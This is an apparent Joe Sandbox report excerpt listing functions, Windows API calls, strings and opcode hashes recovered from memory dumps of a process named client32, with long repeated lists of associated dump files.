                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                • String ID:
                                                                                                • API String ID: 2256153495-0
                                                                                                • Opcode ID: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                                                • Instruction ID: 92f2080e931b07f8e3ae21524f42d2d018667502f077eef341ad82fca5e9a749
                                                                                                • Opcode Fuzzy Hash: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                                                • Instruction Fuzzy Hash: C8F05E74A01328EFDB08CFE5D99482EB7B8AF08748B40487DE429C3208D632DE00DF50
                                                                                                Function 11069480 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(00000000), ref: 11069542
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID: ??CTL32.DLL
                                                                                                • API String ID: 1029625771-2984404022
                                                                                                • Opcode ID: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                                                • Instruction ID: 80b6f585093910a847ce346e7da9e0444a9b2d99666d64fa09b423d85774157b
                                                                                                • Opcode Fuzzy Hash: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                                                • Instruction Fuzzy Hash: 9331CF75A046519FE711CF58DC40BAAFBE8FF46724F0482AAE9199B780F771A800CB91
                                                                                                Function 69CE5840 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • inet_ntoa.WSOCK32(69D2B8DA), ref: 69CE5852
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: inet_ntoa
                                                                                                • String ID: gfff
                                                                                                • API String ID: 1879540557-1553575800
                                                                                                • Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                                • Instruction ID: 921516e2b0aa251f878f945425502120ebc0f71ac446ab22038222b9323dbe7d
                                                                                                • Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                                                • Instruction Fuzzy Hash: E9117B226482DB8BCB268A2DB8606D6BFD9DF96350B184569D8CACB301E611D80AC7D1
                                                                                                Function 110271A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetDriveTypeA.KERNEL32(?), ref: 110271CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DriveType
                                                                                                • String ID: ?:\
                                                                                                • API String ID: 338552980-2533537817
                                                                                                • Opcode ID: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                                • Instruction ID: 6b943fba42bebc5ebf3cfcfc9c23cd16540ffeab11205f7f0861f1320acd89e1
                                                                                                • Opcode Fuzzy Hash: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                                • Instruction Fuzzy Hash: F7F0BB70C44BD96AFB22CE5484445867FDA4F172A9F64C4DEDCD886501D375D188CB91
                                                                                                Function 110ED520 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 110ED4E0: RegCloseKey.ADVAPI32(?), ref: 110ED4ED
                                                                                                • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?), ref: 110ED53C
                                                                                                  • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                                Strings
                                                                                                • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenwvsprintf
                                                                                                • String ID: Error %d Opening regkey %s
                                                                                                • API String ID: 1772833024-3994271378
                                                                                                • Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                                • Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
                                                                                                • Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                                • Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0
                                                                                                Function 11146FE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(NSMTRACE), ref: 11146FF9
                                                                                                  • Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                • String ID: NSMTRACE
                                                                                                • API String ID: 4133054770-4175627554
                                                                                                • Opcode ID: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                                • Instruction ID: 05ea96992fd141bf150828de6ed923b008e63955592f075fac88204ac5220611
                                                                                                • Opcode Fuzzy Hash: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                                • Instruction Fuzzy Hash: 57D05B76641637CFDF069FB555A0575F7E4EB0AA0D3140075E425C7A06EB61D408C751
                                                                                                Function 69CE4F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 69CE4F78
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID: psapi.dll
                                                                                                • API String ID: 1029625771-80456845
                                                                                                • Opcode ID: 50c213185dc4a2aec03a863bf861d659d87c1fb17917f806c41fd09ca274a6be
                                                                                                • Instruction ID: cb7d81cf76920ceecbba5852836574712053f6f5435441496cb39b08ff67ac30
                                                                                                • Opcode Fuzzy Hash: 50c213185dc4a2aec03a863bf861d659d87c1fb17917f806c41fd09ca274a6be
                                                                                                • Instruction Fuzzy Hash: 80E009B1901B108F93B0CF39D504646BBF0BB086503118A3E959EC3A00E330A5848F80
                                                                                                Function 110262C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(psapi.dll), ref: 110262C8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID: psapi.dll
                                                                                                • API String ID: 1029625771-80456845
                                                                                                • Opcode ID: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                                • Instruction ID: e72f5ce5ea606eebe772e5127c5e47cd0fc6cc19585cdbbc80c25ff44c20045f
                                                                                                • Opcode Fuzzy Hash: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                                • Instruction Fuzzy Hash: 50E009B1A01B258FC3B0CF3AA544642BAF0BB086103118A7ED0AEC3A04F330A5448F80
                                                                                                Function 11075090 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 110750EF
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11075159
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary_memset
                                                                                                • String ID:
                                                                                                • API String ID: 1654520187-0
                                                                                                • Opcode ID: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                                • Instruction ID: 75615663fc9b5e204bff5cdf828812fccbd9a8c0715bb2e01743ee940980502e
                                                                                                • Opcode Fuzzy Hash: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                                • Instruction Fuzzy Hash: 28219276E01268A7D710DE95EC41BEFBBBCFB44315F4041AAE90997200EB729A50CBE1
                                                                                                Function 69CE5C90 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ioctlsocket.WSOCK32(962D34B3,4004667F,00000000), ref: 69CE5D1F
                                                                                                • select.WSOCK32(00000001,?,00000000,?,00000000), ref: 69CE5D62
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ioctlsocketselect
                                                                                                • String ID:
                                                                                                • API String ID: 1457273030-0
                                                                                                • Opcode ID: ca69c2054d0c6bd44aeb5ec229908b0d41d4ce5f04bff617c0505194f69327f5
                                                                                                • Instruction ID: c35f445d33fa9c7c8393e4c43e5a72686507a19eca1ac89014bc2d64d5a5cf3e
                                                                                                • Opcode Fuzzy Hash: ca69c2054d0c6bd44aeb5ec229908b0d41d4ce5f04bff617c0505194f69327f5
                                                                                                • Instruction Fuzzy Hash: 842131749012188BEB28CF14C9697EDB7B9EF48304F40C1EAA90E97281D7705F94DF90
                                                                                                Function 11060820 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • std::exception::exception.LIBCMT ref: 110608C3
                                                                                                • __CxxThrowException@8.LIBCMT ref: 110608D8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1338273076-0
                                                                                                • Opcode ID: 95f78effd54cc4b974209cb52787d5f98ef0533aa93d71aaf1408ef8c9560b95
                                                                                                • Instruction ID: 40c1b550870c83f0c669b419c7937a1de5292af9ae005a9ffb354a33ebb971cd
                                                                                                • Opcode Fuzzy Hash: 95f78effd54cc4b974209cb52787d5f98ef0533aa93d71aaf1408ef8c9560b95
                                                                                                • Instruction Fuzzy Hash: F11181BA900609AFC715CF99C840ADAF7F8FB58614F10863EE91997740E774E904CBE1
                                                                                                Function 110886C0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 110886DF
                                                                                                • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalInitializeSection_memset
                                                                                                • String ID:
                                                                                                • API String ID: 453477542-0
                                                                                                • Opcode ID: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                                                • Instruction ID: 67e0870afe33de0d146d23e59662f9f8cfec19dbcaf4764f519a7c8a3238bf1f
                                                                                                • Opcode Fuzzy Hash: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                                                • Instruction Fuzzy Hash: CC1157B1901B148FC3A4CF7A99816C3FAE5BB58354F90892E95EEC2600DB756564CF90
                                                                                                Function 11145010 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
                                                                                                • ExtractIconExA.SHELL32(?,00000000,0006037F,000A035F,00000001), ref: 11145068
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
